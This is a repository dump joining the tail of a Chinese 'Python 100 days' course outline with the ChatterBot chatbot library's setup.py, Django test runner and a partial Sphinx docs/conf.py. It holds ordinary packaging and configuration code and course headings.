[函数和模块的使用](./Day01-15/06.函数和模块的使用.md) - 函数的作用 - 代码的坏味道 / 用函数封装功能模块 - 定义函数 - `def`关键字 / 函数名 / 参数列表 / `return`语句 / 调用自定义函数 - 调用函数 - Python内置函数 / 导入模块和函数 - 函数的参数 - 默认参数 / 可变参数 / 关键字参数 / 命名关键字参数 - 函数的返回值 - 没有返回值 / 返回单个值 / 返回多个值 - 作用域问题 - 局部作用域 / 嵌套作用域 / 全局作用域 / 内置作用域 / 和作用域相关的关键字 - 用模块管理函数 - 模块的概念 / 用自定义模块管理函数 / 命名冲突的时候会怎样(同一个模块和不同的模块) #### Day07 - [字符串和常用数据结构](./Day01-15/07.字符串和常用数据结构.md) - 字符串的使用 - 计算长度 / 下标运算 / 切片 / 常用方法 - 列表基本用法 - 定义列表 / 用下表访问元素 / 下标越界 / 添加元素 / 删除元素 / 修改元素 / 切片 / 循环遍历 - 列表常用操作 - 连接 / 复制(复制元素和复制数组) / 长度 / 排序 / 倒转 / 查找 - 生成列表 - 使用`range`创建数字列表 / 生成表达式 / 生成器 - 元组的使用 - 定义元组 / 使用元组中的值 / 修改元组变量 / 元组和列表转换 - 集合基本用法 - 集合和列表的区别 / 创建集合 / 添加元素 / 删除元素 / 清空 - 集合常用操作 - 交集 / 并集 / 差集 / 对称差 / 子集 / 超集 - 字典的基本用法 - 字典的特点 / 创建字典 / 添加元素 / 删除元素 / 取值 / 清空 - 字典常用操作 - `keys`方法 / `values`方法 / `items`方法 / `setdefault`方法 - 基础练习 - 跑马灯效果 / 列表找最大元素 / 统计考试成绩的平均分 / Fibonacci数列 / 杨辉三角 - 综合案例 - 双色球选号 / 井字棋 #### Day08 - [面向对象编程基础](./Day01-15/08.面向对象编程基础.md) - 类和对象 - 什么是类 / 什么是对象 / 面向对象其他相关概念 - 定义类 - 基本结构 / 属性和方法 / 构造器 / 析构器 / `__str__`方法 - 使用对象 - 创建对象 / 给对象发消息 - 面向对象的四大支柱 - 抽象 / 封装 / 继承 / 多态 - 基础练习 - 定义学生类 / 定义时钟类 / 定义图形类 / 定义汽车类 #### Day09 - [面向对象进阶](./Day01-15/09.面向对象进阶.md) - 属性 - 类属性 / 实例属性 / 属性访问器 / 属性修改器 / 属性删除器 / 使用`__slots__` - 类中的方法 - 实例方法 / 类方法 / 静态方法 - 运算符重载 - `__add__` / `__sub__` / `__or__` /`__getitem__` / `__setitem__` / `__len__` / `__repr__` / `__gt__` / `__lt__` / `__le__` / `__ge__` / `__eq__` / `__ne__` / `__contains__` - 类(的对象)之间的关系 - 关联 / 继承 / 依赖 - 继承和多态 - 什么是继承 / 继承的语法 / 调用父类方法 / 方法重写 / 类型判定 / 多重继承 / 菱形继承(钻石继承)和C3算法 - 综合案例 - 工资结算系统 / 图书自动折扣系统 / 自定义分数类 #### Day10 - [图形用户界面和游戏开发](./Day01-15/10.图形用户界面和游戏开发.md) - 使用`tkinter`开发GUI程序 - 使用`pygame`三方库开发游戏应用 - “大球吃小球”游戏 #### Day11 - [文件和异常](./Day01-15/11.文件和异常.md) - 读文件 - 读取整个文件 / 逐行读取 / 文件路径 - 写文件 - 覆盖写入 / 追加写入 / 文本文件 / 二进制文件 - 异常处理 - 异常机制的重要性 / `try`-`except`代码块 / `else`代码块 / `finally`代码块 / 内置异常类型 / 异常栈 / `raise`语句 - 数据持久化 - CSV文件概述 / `csv`模块的应用 / JSON数据格式 / `json`模块的应用 #### Day12 - [字符串和正则表达式](./Day01-15/12.字符串和正则表达式.md) - 字符串高级操作 - 转义字符 / 原始字符串 / 多行字符串 / `in`和`not in`运算符 / `is_xxx`方法 / `join`和`split`方法 / `strip`相关方法 / `pyperclip`模块 / 不变字符串和可变字符串 / `StringIO`的使用 - 正则表达式入门 - 正则表达式的作用 / 元字符 / 转义 / 量词 / 分组 / 零宽断言 /贪婪匹配与惰性匹配懒惰 / 使用`re`模块实现正则表达式操作(匹配、搜索、替换、捕获) - 使用正则表达式 - `re`模块 / `compile`函数 / `group`和`groups`方法 / `match`方法 / `search`方法 / `findall`和`finditer`方法 / `sub`和`subn`方法 / `split`方法 - 应用案例 - 使用正则表达式验证输入的字符串 #### Day13 - [进程和线程](./Day01-15/13.进程和线程.md) - 进程和线程的概念 - 什么是进程 / 什么是线程 / 多线程的应用场景 - 使用进程 - `fork`函数 / `multiprocessing`模块 / 进程池 / 进程间通信 - 使用线程 - `threading`模块 / `Thread`类 / `RLock`类 / `Condition`类 / 线程池 #### Day14 - [网络编程入门和网络应用开发](./Day01-15/14.网络编程入门和网络应用开发.md) - 计算机网络基础 - 计算机网络发展史 / “TCP-IP”模型 / IP地址 / 端口 / 协议 / 其他相关概念 - 网络应用模式 - “客户端-服务器”模式 / “浏览器-服务器”模式 - 基于HTTP协议访问网络资源 - 网络API概述 / 访问URL / `requests`三方库 / 解析JSON格式数据 - Python网络编程 - 套接字的概念 / `socket`模块 / `socket`函数 / 创建TCP服务器 / 创建TCP客户端 / 创建UDP服务器 / 创建UDP客户端 - 电子邮件 - SMTP协议 / POP3协议 / IMAP协议 / `smtplib`模块 / `poplib`模块 / `imaplib`模块 - 短信服务 - 调用短信服务网关 #### Day15 - [图像和文档处理](./Day01-15/15.图像和办公文档处理.md) - 用Pillow处理图片 - 图片读写 / 图片合成 / 几何变换 / 色彩转换 / 滤镜效果 - 读写Word文档 - 文本内容的处理 / 段落 / 页眉和页脚 / 样式的处理 - 读写Excel文件 - `xlrd` / `xlwt` / `openpyxl` ### Day16~Day20 - [Python语言进阶 ](./Day16-20/16-20.Python语言进阶.md) - 常用数据结构 - 函数的高级用法 - “一等公民” / 高阶函数 / Lambda函数 / 作用域和闭包 / 装饰器 - 面向对象高级知识 - “三大支柱” / 类与类之间的关系 / 垃圾回收 / 魔术属性和方法 / 混入 / 元类 / 面向对象设计原则 / GoF设计模式 - 迭代器和生成器 - 相关魔术方法 / 创建生成器的两种方式 / - 并发和异步编程 - 多线程 / 多进程 / 异步IO / `async`和`awai`t ### Day21~30 - [Web前端入门](./Day21-30/21-30.Web前端概述.md) - 用HTML标签承载页面内容 - 用CSS渲染页面 - 用JavaScript处理交互式行为 - jQuery入门和提高 - Vue.js入门 - Element的使用 - Bootstrap的使用 ### Day31~35 - [玩转Linux操作系统](./Day31-35/31-35.玩转Linux操作系统.md) - 操作系统发展史和Linux概述 - Linux基础命令 - Linux中的实用程序 - Linux的文件系统 - Vim编辑器的应用 - 环境变量和Shell编程 - 软件的安装和服务的配置 - 网络访问和管理 - 其他相关内容 ### Day36~45 - 数据库基础和进阶 #### Day36 - [关系型数据库和MySQL概述](./Day36-45/36.关系型数据库和MySQL概述.md) - 关系型数据库概述 - MySQL简介 - 安装MySQL - MySQL基本命令 #### Day37 - [SQL详解之DDL](./Day36-45/37.SQL详解之DDL.md) - 建库建表 - 删除表和修改表 #### Day38 - [SQL详解之DML](./Day36-45/38.SQL详解之DML.md) - insert操作 - delete操作 - update操作 #### Day39 - [SQL详解之DQL](./Day36-45/39.SQL详解之DQL.md) - 投影和别名 - 筛选数据 - 空值处理 - 去重 - 排序 - 聚合函数 - 嵌套查询 - 分组 - 表连接 - 笛卡尔积 - 内连接 - 自然连接 - 外连接 - 窗口函数 - 定义窗口 - 排名函数 - 取数函数 #### Day40 - [SQL详解之DCL](./Day36-45/40.SQL详解之DCL.md) - 创建用户 - 授予权限 - 召回权限 #### Day41 - [MySQL新特性](./Day36-45/41.MySQL新特性.md) - JSON类型 - 窗口函数 - 公共表表达式 #### Day42 - [视图、函数和过程](./Day36-45/42.视图、函数和过程.md) - 视图 - 使用场景 - 创建视图 - 使用限制 - 函数 - 内置函数 - 用户自定义函数(UDF) - 过程 - 创建过程 - 调用过程 #### Day43 - [索引](./Day36-45/43.索引.md) - 执行计划 - 索引的原理 - 创建索引 - 普通索引 - 唯一索引 - 前缀索引 - 复合索引 - 注意事项 #### Day44 - [Python接入MySQL数据库](./Day36-45/44.Python接入MySQL数据库.md) - 安装三方库 - 创建连接 - 获取游标 - 执行SQL语句 - 通过游标抓取数据 - 事务提交和回滚 - 释放连接 - 编写ETL脚本 #### Day45 - [大数据平台和HiveSQL](./Day36-45/45.大数据平台和HiveSQL.md) - Hadoop生态圈 - Hive概述 - 准备工作 - 数据类型 - DDL操作 - DML操作 - 数据查询 ### Day46~60 - 实战Django #### Day46 - [Django快速上手](./Day46-60/46.Django快速上手.md) - Web应用工作机制 - HTTP请求和响应 - Django框架概述 - 5分钟快速上手 #### Day47 - [深入模型](./Day46-60/47.深入模型.md) - 关系型数据库配置 - 使用ORM完成对模型的CRUD操作 - 管理后台的使用 - Django模型最佳实践 - 模型定义参考 #### Day48 - [静态资源和Ajax请求](./Day46-60/48.静态资源和Ajax请求.md) - 加载静态资源 - Ajax概述 - 用Ajax实现投票功能 #### Day49 - [Cookie和Session](./Day46-60/49.Cookie和Session.md) - 实现用户跟踪 - cookie和session的关系 - Django框架对session的支持 - 视图函数中的cookie读写操作 #### Day50 - [报表和日志](./Day46-60/50.制作报表.md) - 通过`HttpResponse`修改响应头 - 使用`StreamingHttpResponse`处理大文件 - 使用`xlwt`生成Excel报表 - 使用`reportlab`生成PDF报表 - 使用ECharts生成前端图表 #### Day51 - [日志和调试工具栏](./Day46-60/51.日志和调试工具栏.md) - 配置日志 - 配置Django-Debug-Toolbar - 优化ORM代码 #### Day52 - [中间件的应用](./Day46-60/52.中间件的应用.md) - 什么是中间件 - Django框架内置的中间件 - 自定义中间件及其应用场景 #### Day53 - [前后端分离开发入门](./Day46-60/53.前后端分离开发入门.md) - 返回JSON格式的数据 - 用Vue.js渲染页面 #### Day54 - [RESTful架构和DRF入门](./Day46-60/54.RESTful架构和DRF入门.md) - REST概述 - DRF库使用入门 - 前后端分离开发 - JWT的应用 #### Day55 - [RESTful架构和DRF进阶](./Day46-60/55.RESTful架构和DRF进阶.md) - 使用CBV - 数据分页 - 数据筛选 #### Day56 - [使用缓存](./Day46-60/56.使用缓存.md) - 网站优化第一定律 - 在Django项目中使用Redis提供缓存服务 - 在视图函数中读写缓存 - 使用装饰器实现页面缓存 - 为数据接口提供缓存服务 #### Day57 - [接入三方平台](./Day46-60/57.接入三方平台.md) - 文件上传表单控件和图片文件预览 - 服务器端如何处理上传的文件 #### Day58 - [异步任务和定时任务](./Day46-60/58.异步任务和定时任务.md) - 网站优化第二定律 - 配置消息队列服务 - 在项目中使用Celery实现任务异步化 - 在项目中使用Celery实现定时任务 #### Day59 - [单元测试](./Day46-60/59.单元测试.md) #### Day60 - [项目上线](./Day46-60/60.项目上线.md) - Python中的单元测试 - Django框架对单元测试的支持 - 使用版本控制系统 - 配置和使用uWSGI - 动静分离和Nginx配置 - 配置HTTPS - 配置域名解析 ### Day61~65 - [爬虫开发](./Day61-65) #### Day61 - [网络数据采集概述](./Day61-65/61.网络数据采集概述.md) - 网络爬虫的概念及其应用领域 - 网络爬虫的合法性探讨 - 开发网络爬虫的相关工具 - 一个爬虫程序的构成 #### Day62 - 数据抓取和解析 - [使用`requests`三方库实现数据抓取](./Day61-65/62.用Python获取网络资源-1.md) - [页面解析的三种方式](./Day61-65/62.用Python解析HTML页面-2.md) - 正则表达式解析 - XPath解析 - CSS选择器解析 #### Day63 - Python中的并发编程 - [多线程](./Day61-65/63.Python中的并发编程-1.md) - [多进程](./Day61-65/63.Python中的并发编程-2.md) - [异步I/O](./Day61-65/63.Python中的并发编程-3.md) #### Day64 - [使用Selenium抓取网页动态内容](./Day61-65/64.使用Selenium抓取网页动态内容.md) - 安装Selenium - 加载页面 - 查找元素和模拟用户行为 - 隐式等待和显示等待 - 执行JavaScript代码 - Selenium反爬破解 - 设置无头浏览器 #### Day65 - [爬虫框架Scrapy简介](./Day61-65/65.爬虫框架Scrapy简介.md) - Scrapy核心组件 - Scrapy工作流程 - 安装Scrapy和创建项目 - 编写蜘蛛程序 - 编写中间件和管道程序 - Scrapy配置文件 ### Day66~80 - 数据分析 #### Day66 - [数据分析概述](./Day66-80/66.数据分析概述.md) - 数据分析师的职责 - 数据分析师的技能栈 - 数据分析相关库 #### Day67 - [环境准备](./Day66-80/67.环境准备.md) - 安装和使用anaconda - conda相关命令 - 安装和使用jupyter-lab - 安装和启动 - 使用小技巧 #### Day68 - [NumPy的应用-1](./Day66-80/68.NumPy的应用-1.md) - 创建数组对象 - 数组对象的属性 - 数组对象的索引运算 - 普通索引 - 花式索引 - 布尔索引 - 切片索引 - 案例:使用数组处理图像 #### Day69 - [NumPy的应用-2](./Day66-80/69.NumPy的应用-2.md) - 数组对象的相关方法 - 获取描述性统计信息 - 其他相关方法 #### Day70 - [NumPy的应用-3](./Day66-80/70.NumPy的应用-3.md) - 数组的运算 - 数组跟标量的运算 - 数组跟数组的运算 - 通用一元函数 - 通用二元函数 - 广播机制 - Numpy常用函数 #### Day71 - [NumPy的应用-4](./Day66-80/71.NumPy的应用-4.md) - 向量 - 行列式 - 矩阵 - 多项式 #### Day72 - [深入浅出pandas-1](./Day66-80/72.深入浅出pandas-1.md) - 创建`Series`对象 - `Series`对象的运算 - `Series`对象的属性和方法 #### Day73 - [深入浅出pandas-2](./Day66-80/73.深入浅出pandas-2.md) - 创建`DataFrame`对象 - `DataFrame`对象的属性和方法 - 读写`DataFrame`中的数据 #### Day74 - [深入浅出pandas-3](./Day66-80/74.深入浅出pandas-3.md) - 数据重塑 - 数据拼接 - 数据合并 - 数据清洗 - 缺失值 - 重复值 - 异常值 - 预处理 #### Day75 - [深入浅出pandas-4](./Day66-80/75.深入浅出pandas-4.md) - 数据透视 - 获取描述性统计信息 - 排序和头部值 - 分组聚合 - 透视表和交叉表 - 数据呈现 #### Day76 - [深入浅出pandas-5](./Day66-80/76.深入浅出pandas-5.md) - 计算同比环比 - 窗口计算 - 相关性判定 #### Day77 - [深入浅出pandas-6](./Day66-80/77.深入浅出pandas-6.md) - 索引的使用 - 范围索引 - 分类索引 - 多级索引 - 间隔索引 - 日期时间索引 #### Day78 - [数据可视化-1](./Day66-80/78.数据可视化-1.md) - 安装和导入matplotlib - 创建画布 - 创建坐标系 - 绘制图表 - 折线图 - 散点图 - 柱状图 - 饼状图 - 直方图 - 箱线图 - 显示和保存图表 #### Day79 - [数据可视化-2](./Day66-80/79.数据可视化-2.md) - 高阶图表 - 气泡图 - 面积图 - 雷达图 - 玫瑰图 - 3D图表 #### Day80 - [数据可视化-3](./Day66-80/80.数据可视化-3.md) - Seaborn - Pyecharts ### Day81~90 - [机器学习和深度学习](./Day81-90) #### Day81 - [机器学习基础](./Day81-90/81.机器学习基础.md) #### Day82 - [k最近邻分类](./Day81-90/82.k最近邻分类.md) #### Day83 - [决策树](./Day81-90/83.决策树.md) #### Day84 - [贝叶斯分类](./Day81-90/84.贝叶斯分类.md) #### Day85 - [支持向量机](./Day81-90/85.支持向量机.md) #### Day86 - [K-均值聚类](./Day81-90/86.K-均值聚类.md) #### Day87 - [回归分析](./Day81-90/87.回归分析.md) #### Day88 - [深度学习入门](./Day81-90/88.深度学习入门.md) #### Day89 - [PyTorch概述](./Day81-90/89.PyTorch概述.md) #### Day90 - [PyTorch实战](./Day81-90/90.PyTorch实战.md) ### Day91~100 - [团队项目开发](./Day91-100) #### 第91天:[团队项目开发的问题和解决方案](./Day91-100/91.团队项目开发的问题和解决方案.md) 1. 软件过程模型 - 经典过程模型(瀑布模型) - 可行性分析(研究做还是不做),输出《可行性分析报告》。 - 需求分析(研究做什么),输出《需求规格说明书》和产品界面原型图。 - 概要设计和详细设计,输出概念模型图(ER图)、物理模型图、类图、时序图等。 - 编码 / 测试。 - 上线 / 维护。 瀑布模型最大的缺点是无法拥抱需求变化,整套流程结束后才能看到产品,团队士气低落。 - 敏捷开发(Scrum)- 产品所有者、Scrum Master、研发人员 - Sprint - 产品的Backlog(用户故事、产品原型)。 - 计划会议(评估和预算)。 - 日常开发(站立会议、番茄工作法、结对编程、测试先行、代码重构……)。 - 修复bug(问题描述、重现步骤、测试人员、被指派人)。 - 发布版本。 - 评审会议(Showcase,用户需要参与)。 - 回顾会议(对当前迭代周期做一个总结)。 > 补充:敏捷软件开发宣言 > > - **个体和互动** 高于 流程和工具 > - **工作的软件** 高于 详尽的文档 > - **客户合作** 高于 合同谈判 > - **响应变化** 高于 遵循计划 ![](./res/agile-scrum-sprint-cycle.png) > 角色:产品所有者(决定做什么,能对需求拍板的人)、团队负责人(解决各种问题,专注如何更好的工作,屏蔽外部对开发团队的影响)、开发团队(项目执行人员,具体指开发人员和测试人员)。 > 准备工作:商业案例和资金、合同、憧憬、初始产品需求、初始发布计划、入股、组建团队。 > 敏捷团队通常人数为8-10人。 > 工作量估算:将开发任务量化,包括原型、Logo设计、UI设计、前端开发等,尽量把每个工作分解到最小任务量,最小任务量标准为工作时间不能超过两天,然后估算总体项目时间。把每个任务都贴在看板上面,看板上分三部分:to do(待完成)、in progress(进行中)和done(已完成)。 2. 项目团队组建 - 团队的构成和角色 > 说明:感谢**付祥英**女士帮助我绘制了下面这张精美的公司组织架构图。 ![company_architecture](./res/company_architecture.png) - 编程规范和代码审查(`flake8`、`pylint`) ![](./res/pylint.png) - Python中的一些“惯例”(请参考[《Python惯例-如何编写Pythonic的代码》](Python惯例.md)) - 影响代码可读性的原因: - 代码注释太少或者没有注释 - 代码破坏了语言的最佳实践 - 反模式编程(意大利面代码、复制-黏贴编程、自负编程、……) 3. 团队开发工具介绍 - 版本控制:Git、Mercury - 缺陷管理:[Gitlab](https://about.gitlab.com/)、[Redmine](http://www.redmine.org.cn/) - 敏捷闭环工具:[禅道](https://www.zentao.net/)、[JIRA](https://www.atlassian.com/software/jira/features) - 持续集成:[Jenkins](https://jenkins.io/)、[Travis-CI](https://travis-ci.org/) 请参考[《团队项目开发的问题和解决方案》](Day91-100/91.团队项目开发的问题和解决方案.md)。 ##### 项目选题和理解业务 1. 选题范围设定 - CMS(用户端):新闻聚合网站、问答/分享社区、影评/书评网站等。 - MIS(用户端+管理端):KMS、KPI考核系统、HRS、CRM系统、供应链系统、仓储管理系统等。 - App后台(管理端+数据接口):二手交易类、报刊杂志类、小众电商类、新闻资讯类、旅游类、社交类、阅读类等。 - 其他类型:自身行业背景和工作经验、业务容易理解和把控。 2. 需求理解、模块划分和任务分配 - 需求理解:头脑风暴和竞品分析。 - 模块划分:画思维导图(XMind),每个模块是一个枝节点,每个具体的功能是一个叶节点(用动词表述),需要确保每个叶节点无法再生出新节点,确定每个叶子节点的重要性、优先级和工作量。 - 任务分配:由项目负责人根据上面的指标为每个团队成员分配任务。 ![](./res/requirements_by_xmind.png) 3. 制定项目进度表(每日更新) | 模块 | 功能 | 人员 | 状态 | 完成 | 工时 | 计划开始 | 实际开始 | 计划结束 | 实际结束 | 备注 | | ---- | -------- | ------ | -------- | ---- | ---- | -------- | -------- | -------- | -------- | ---------------- | | 评论 | 添加评论 | 王大锤 | 正在进行 | 50% | 4 | 2018/8/7 | | 2018/8/7 | | | | | 删除评论 | 王大锤 | 等待 | 0% | 2 | 2018/8/7 | | 2018/8/7 | | | | | 查看评论 | 白元芳 | 正在进行 | 20% | 4 | 2018/8/7 | | 2018/8/7 | | 需要进行代码审查 | | | 评论投票 | 白元芳 | 等待 | 0% | 4 | 2018/8/8 | | 2018/8/8 | | | 4. OOAD和数据库设计 - UML(统一建模语言)的类图 ![uml](./res/uml-class-diagram.png) - 通过模型创建表(正向工程),例如在Django项目中可以通过下面的命令创建二维表。 ```Shell python manage.py makemigrations app python manage.py migrate ``` - 使用PowerDesigner绘制物理模型图。 ![](./res/power-designer-pdm.png) - 通过数据表创建模型(反向工程),例如在Django项目中可以通过下面的命令生成模型。 ```Shell python manage.py inspectdb > app/models.py ``` #### 第92天:[Docker容器技术详解](./Day91-100/92.Docker容器技术详解.md) 1. Docker简介 2. 安装Docker 3. 使用Docker创建容器(Nginx、MySQL、Redis、Gitlab、Jenkins) 4. 构建Docker镜像(Dockerfile的编写和相关指令) 5. 容器编排(Docker-compose) 6. 集群管理(Kubernetes) #### 第93天:[MySQL性能优化](./Day91-100/93.MySQL性能优化.md) 1. 基本原则 2. InnoDB引擎 3. 索引的使用和注意事项 4. 数据分区 5. SQL优化 6. 配置优化 7. 架构优化 #### 第94天:[网络API接口设计](./Day91-100/94.网络API接口设计.md) - 设计原则 - 关键问题 - 其他问题 - 文档撰写 #### 第95天:[使用Django开发商业项目](./Day91-100/95.使用Django开发商业项 目.md) ##### 项目开发中的公共问题 1. 数据库的配置(多数据库、主从复制、数据库路由) 2. 缓存的配置(分区缓存、键设置、超时设置、主从复制、故障恢复(哨兵)) 3. 日志的配置 4. 分析和调试(Django-Debug-ToolBar) 5. 好用的Python模块(日期计算、图像处理、数据加密、三方API) ##### REST API设计 1. RESTful架构 - [理解RESTful架构](http://www.ruanyifeng.com/blog/2011/09/restful.html) - [RESTful API设计指南](http://www.ruanyifeng.com/blog/2014/05/restful_api.html) - [RESTful API最佳实践](http://www.ruanyifeng.com/blog/2018/10/restful-api-best-practices.html) 2. API接口文档的撰写 - [RAP2](http://rap2.taobao.org/) - [YAPI](http://yapi.demo.qunar.com/) 3. [django-REST-framework](https://www.django-rest-framework.org/)的应用 ##### 项目中的重点难点剖析 1. 使用缓存缓解数据库压力 - Redis 2. 使用消息队列做解耦合和削峰 - Celery + RabbitMQ #### 第96天:[软件测试和自动化测试](Day91-100/96.软件测试和自动化测试.md) ##### 单元测试 1. 测试的种类 2. 编写单元测试(`unittest`、`pytest`、`nose2`、`tox`、`ddt`、……) 3. 测试覆盖率(`coverage`) ##### Django项目部署 1. 部署前的准备工作 - 关键设置(SECRET_KEY / DEBUG / ALLOWED_HOSTS / 缓存 / 数据库) - HTTPS / CSRF_COOKIE_SECUR / SESSION_COOKIE_SECURE - 日志相关配置 2. Linux常用命令回顾 3. Linux常用服务的安装和配置 4. uWSGI/Gunicorn和Nginx的使用 - Gunicorn和uWSGI的比较 - 对于不需要大量定制化的简单应用程序,Gunicorn是一个不错的选择,uWSGI的学习曲线比Gunicorn要陡峭得多,Gunicorn的默认参数就已经能够适应大多数应用程序。 - uWSGI支持异构部署。 - 由于Nginx本身支持uWSGI,在线上一般都将Nginx和uWSGI捆绑在一起部署,而且uWSGI属于功能齐全且高度定制的WSGI中间件。 - 在性能上,Gunicorn和uWSGI其实表现相当。 5. 使用虚拟化技术(Docker)部署测试环境和生产环境 ##### 性能测试 1. AB的使用 2. SQLslap的使用 3. sysbench的使用 ##### 自动化测试 1. 使用Shell和Python进行自动化测试 2. 使用Selenium实现自动化测试 - Selenium IDE - Selenium WebDriver - Selenium Remote Control 3. 测试工具Robot Framework介绍 #### 第97天:[电商网站技术要点剖析](./Day91-100/97.电商网站技术要点剖析.md) 1. 商业模式和需求要点 2. 物理模型设计 3. 第三方登录 4. 缓存预热和查询缓存 5. 购物车的实现 6. 支付功能集成 7. 秒杀和超卖问题 8. 静态资源管理 9. 全文检索方案 #### 第98天:[项目部署上线和性能调优](./Day91-100/98.项目部署上线和性能调优.md) 1. MySQL数据库调优 2. Web服务器性能优化 - Nginx负载均衡配置 - Keepalived实现高可用 3. 代码性能调优 - 多线程 - 异步化 4. 静态资源访问优化 - 云存储 - CDN #### 第99天:[面试中的公共问题](./Day91-100/99.面试中的公共问题.md) - 计算机基础 - Python基础 - Web框架相关 - 爬虫相关问题 - 数据分析 - 项目相关 #### 第100天:[Python面试题实录](./Day91-100/100.Python面试题实录.md)
ChatterBot
4ff8af28567ed446ae796d37c246bb6a14032fe7
File: setup.py #!/usr/bin/env python """ ChatterBot setup file. """ import os import sys import platform import configparser from setuptools import setup if sys.version_info[0] < 3: raise Exception( 'You are tying to install ChatterBot on Python version {}.\n' 'Please install ChatterBot in Python 3 instead.'.format( platform.python_version() ) ) config = configparser.ConfigParser() current_directory = os.path.dirname(os.path.abspath(__file__)) config_file_path = os.path.join(current_directory, 'setup.cfg') config.read(config_file_path) VERSION = config['chatterbot']['version'] AUTHOR = config['chatterbot']['author'] AUTHOR_EMAIL = config['chatterbot']['email'] URL = config['chatterbot']['url'] with open('README.md') as f: LONG_DESCRIPTION = f.read() REQUIREMENTS = [] DEPENDENCIES = [] with open('requirements.txt') as requirements: for requirement in requirements.readlines(): if requirement.startswith('git+git://'): DEPENDENCIES.append(requirement) else: REQUIREMENTS.append(requirement) setup( name='ChatterBot', version=VERSION, url=URL, download_url='{}/tarball/{}'.format(URL, VERSION), project_urls={ 'Documentation': 'https://chatterbot.readthedocs.io', }, description='ChatterBot is a machine learning, conversational dialog engine.', long_description=LONG_DESCRIPTION, long_description_content_type='text/markdown', author=AUTHOR, author_email=AUTHOR_EMAIL, packages=[ 'chatterbot', 'chatterbot.storage', 'chatterbot.logic', 'chatterbot.ext', 'chatterbot.ext.sqlalchemy_app', 'chatterbot.ext.django_chatterbot', 'chatterbot.ext.django_chatterbot.migrations', ], package_dir={'chatterbot': 'chatterbot'}, include_package_data=True, install_requires=REQUIREMENTS, dependency_links=DEPENDENCIES, python_requires='>=3.4, <=3.8', license='BSD', zip_safe=True, platforms=['any'], keywords=['ChatterBot', 'chatbot', 'chat', 'bot'], classifiers=[ 'Development Status :: 4 - Beta', 'Intended Audience :: Developers', 'License :: OSI Approved :: BSD License', 'Environment :: Console', 'Environment :: Web Environment', 'Operating System :: OS Independent', 'Topic :: Software Development :: Libraries :: Python Modules', 'Topic :: Communications :: Chat', 'Topic :: Internet', 'Programming Language :: Python', 'Programming Language :: Python :: 3', 'Programming Language :: Python :: 3.4', 'Programming Language :: Python :: 3.5', 'Programming Language :: Python :: 3.6', 'Programming Language :: Python :: 3.7', 'Programming Language :: Python :: 3.8', 'Programming Language :: Python :: 3 :: Only', ], test_suite='tests' ) File: runtests.py #!/usr/bin/env python """ This is the test runner for the ChatterBot's Django tests. """ import os import sys import django from django.conf import settings from django.test.utils import get_runner if __name__ == '__main__': os.environ['DJANGO_SETTINGS_MODULE'] = 'tests_django.test_settings' django.setup() TestRunner = get_runner(settings) test_runner = TestRunner( verbosity=2 ) failures = test_runner.run_tests(['tests_django']) sys.exit(bool(failures)) File: docs/conf.py import os import sys import configparser from datetime import datetime import sphinx_rtd_theme config = configparser.ConfigParser() current_directory = os.path.dirname(os.path.abspath(__file__)) parent_directory = os.path.abspath(os.path.join(current_directory, os.pardir)) config_file_path = os.path.join(parent_directory, 'setup.cfg') config.read(config_file_path) # Insert the project root dir as the first element in the PYTHONPATH. # This lets us ensure that the source package is imported, and used to generate the documentation. sys.path.insert(0, parent_directory) # Sphinx extension modules extensions = [ 'sphinx.ext.autodoc', 'sphinx.ext.autosectionlabel', 'sphinx.ext.coverage', 'sphinx.ext.doctest', 'sphinx.ext.intersphinx', 'sphinx.ext.mathjax', 'sphinx.ext.todo', 'sphinx.ext.viewcode' ] # Add any paths that contain templates here, relative to this directory. templates_path = ['_templates'] # The suffix(es) of source filenames. # You can specify multiple suffix as a list of string: source_suffix = ['.rst', '.md'] # The encoding of source files # source_encoding = 'utf-8-sig' # The master toctree document master_doc = 'index' # General information about the project project = 'ChatterBot' author = config['chatterbot']['author'] copyright = '{}, {}'.format( datetime.now().year, author ) # The full version, including alpha/beta/rc tags release = config['chatterbot']['version'] # The short X.Y version version = config['chatterbot']['version'].rsplit('.', 1)[0] language = 'en' # List of patterns, relative to source directory, that match files and # directories to ignore when looking for source files. # This patterns also effect to html_static_path and html_extra_path exclude_patterns = [] # If true, '()' will be appended to :func: etc. cross-reference text # add_function_parentheses = True # If true, the current module name will be prepended to all description # unit titles (such as .. function::) # add_module_names = True # If true, sectionauthor and moduleauthor directives will be shown in the # output. They are ignored by default. # show_authors = False # The name of the Pygments (syntax highlighting) style to use pygments_style = 'sphinx' # -- Options for HTML output ---------------------------------------------- html_theme = 'sphinx_rtd_theme' html_theme_path = [sphinx_rtd_theme.get_html_theme_path()] # Theme options are theme-specific and customize the look and feel of a theme # further. For a list of options available for each theme, see the # documentation. html_theme_options = { 'logo_only': True } html_show_sourcelink = False # A shorter title for the navigation bar. Default is the same as html_title. # html_short_title = None # The name of an image file (relative to this directory) to place at the top # of the sidebar. html_logo = '../graphics/banner.png' # The name of an image file (relative to this directory) to use as a favicon of # the docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32 # pixels large. html_favicon = '_static/favicon.ico' # Add any paths that contain custom static files (such as style sheets) here, # relative to this directory. They are copied after the builtin static files, # so a file named "default.css" will overwrite the builtin "default.css". html_static_path = ['_static'] # Add any extra paths that contain custom files (such as robots.txt or # .htaccess) here, relative to this directory. These files are copied # directly to the root of the documentation. # html_extra_path = [] # If not None, a 'Last updated on:' timestamp is inserted at every page # bottom, using the given strftime format. # The empty string is equivalent to '%b %d, %Y'. # html_last_updated_fmt = None # Custom sidebar templates, maps document names to template names. # html_sidebars = {} # Additional templates that should be rendered to pages, maps page names to # template names. # html_additional_pages = {} # If false, no module index is generated. # html_domain_indices = True # If false, no index is generated. # html_use_index = True # Split the index into individual pages for each letter. html_split_index = True # If true, "Created using Sphinx" is shown in the HTML footer. Default is True. html_show_sphinx = False # Language to be used for generating the HTML full-text search index. # Sphinx supports the following languages: # 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja' # 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr', 'zh' html_search_language = 'en' # Output file base name for HTML help builder htmlhelp_basename = 'ChatterBotdoc' # Read the docs theme modifications html_context = { 'extra_css_files': [ '_static/style.css' ] } # Grouping the document tree into LaTeX files. List of tuples # (source start file, target name, title, # author, documentclass [howto, manual, or own class]) latex_documents = [ (master_doc, 'ChatterBot.tex', u'ChatterBot Documentation', u'Gunther Cox', 'manual'), ] # -- Options for manual page output --------------------------------------- # One entry per manual page. List of tuples # (source start file, name, description, authors, manual section) man_pages = [ (master_doc, 'chatterbot', u'ChatterBot Documentation', 